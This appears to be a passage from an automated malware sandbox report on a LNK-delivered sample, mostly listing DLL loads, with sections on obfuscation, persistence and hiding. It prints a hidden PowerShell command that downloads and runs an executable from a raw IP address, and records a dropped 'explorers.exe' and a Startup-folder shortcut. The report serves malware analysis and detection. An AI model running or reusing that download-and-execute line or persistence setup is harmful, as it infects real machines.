                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: msi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: dbgcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: msi.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: dbgcore.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: msi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: msi.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: dbgcore.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
                            Source: LPO-0048532025.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Source: {BE5C9BF3-0A41-4A6C-B6A8-511461B7BEF1}.lnk.14.drLNK file: ..\..\..\..\..\..\..\..\..\ProgramData\{F507C7EB-0460-419E-BE06-0FA6DFA315DF}\{C0EDD55B-2610-4BC4-A06C-A014DB07F034}.bat
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: file.exe, 00000003.00000002.1487330600.00007FF72804F000.00000040.00000001.01000000.00000007.sdmp, explorers.exe, 00000007.00000002.3826990355.00007FF74B32F000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmp, explorers.exe, 00000014.00000002.1653947897.00007FF74B32F000.00000040.00000001.01000000.00000008.sdmp
                            Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: file.exe, file.exe, 00000003.00000002.1487330600.00007FF72804F000.00000040.00000001.01000000.00000007.sdmp, explorers.exe, explorers.exe, 00000007.00000002.3826990355.00007FF74B32F000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, explorer.exe, 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmp, explorers.exe, 00000014.00000002.1653947897.00007FF74B32F000.00000040.00000001.01000000.00000008.sdmp

                            Data Obfuscation

                            barindex
                            Detected unpacking (changes PE section rights)
                            Source: C:\Users\user\AppData\Local\Temp\file.exeUnpacked PE file: 3.2.file.exe.7ff727cf0000.0.unpack :EW;.rsrc:W;.idata :W;gvpobjry:EW;raqptenq:EW;.pdata:R; vs :ER;.rsrc:W;.idata :W;gvpobjry:EW;raqptenq:EW;.pdata:R;
                            Source: C:\ProgramData\explorers\explorers.exeUnpacked PE file: 7.2.explorers.exe.7ff74afd0000.0.unpack :EW;.rsrc:W;.idata :W;gvpobjry:EW;raqptenq:EW;.pdata:R; vs :ER;.rsrc:W;.idata :W;gvpobjry:EW;raqptenq:EW;.pdata:R;
                            Source: C:\ProgramData\explorers\explorers.exeUnpacked PE file: 20.2.explorers.exe.7ff74afd0000.0.unpack :EW;.rsrc:W;.idata :W;gvpobjry:EW;raqptenq:EW;.pdata:R; vs :ER;.rsrc:W;.idata :W;gvpobjry:EW;raqptenq:EW;.pdata:R;
                            Suspicious powershell command line found
                            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"
                            Source: initial sampleStatic PE information: section where entry point is pointing to: raqptenq
                            Source: file.exe.0.drStatic PE information: section name:
                            Source: file.exe.0.drStatic PE information: section name: .idata
                            Source: file.exe.0.drStatic PE information: section name: gvpobjry
                            Source: file.exe.0.drStatic PE information: section name: raqptenq
                            Source: file.exe.0.drStatic PE information: section name: .pdataI
                            Source: explorers.exe.3.drStatic PE information: section name:
                            Source: explorers.exe.3.drStatic PE information: section name: .idata
                            Source: explorers.exe.3.drStatic PE information: section name: gvpobjry
                            Source: explorers.exe.3.drStatic PE information: section name: raqptenq
                            Source: explorers.exe.3.drStatic PE information: section name: .pdataI

                            Persistence and Installation Behavior

                            barindex
                            Windows shortcut file (LNK) starts blacklisted processes
                            Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                            Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                            Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                            Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                            Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
                            Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                            Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
                            Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                            Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\ProgramData\explorers\explorers.exeJump to dropped file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\file.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\ProgramData\explorers\explorers.exeJump to dropped file
                            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{BE5C9BF3-0A41-4A6C-B6A8-511461B7BEF1}.lnkJump to behavior
                            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{BE5C9BF3-0A41-4A6C-B6A8-511461B7BEF1}.lnkJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\AppData\Local\Temp\file.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\{76D64632-8D60-4428-AF81-91BB2A15697E} {F7D6A9F6-DB48-4D93-A191-046841E554FA}Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
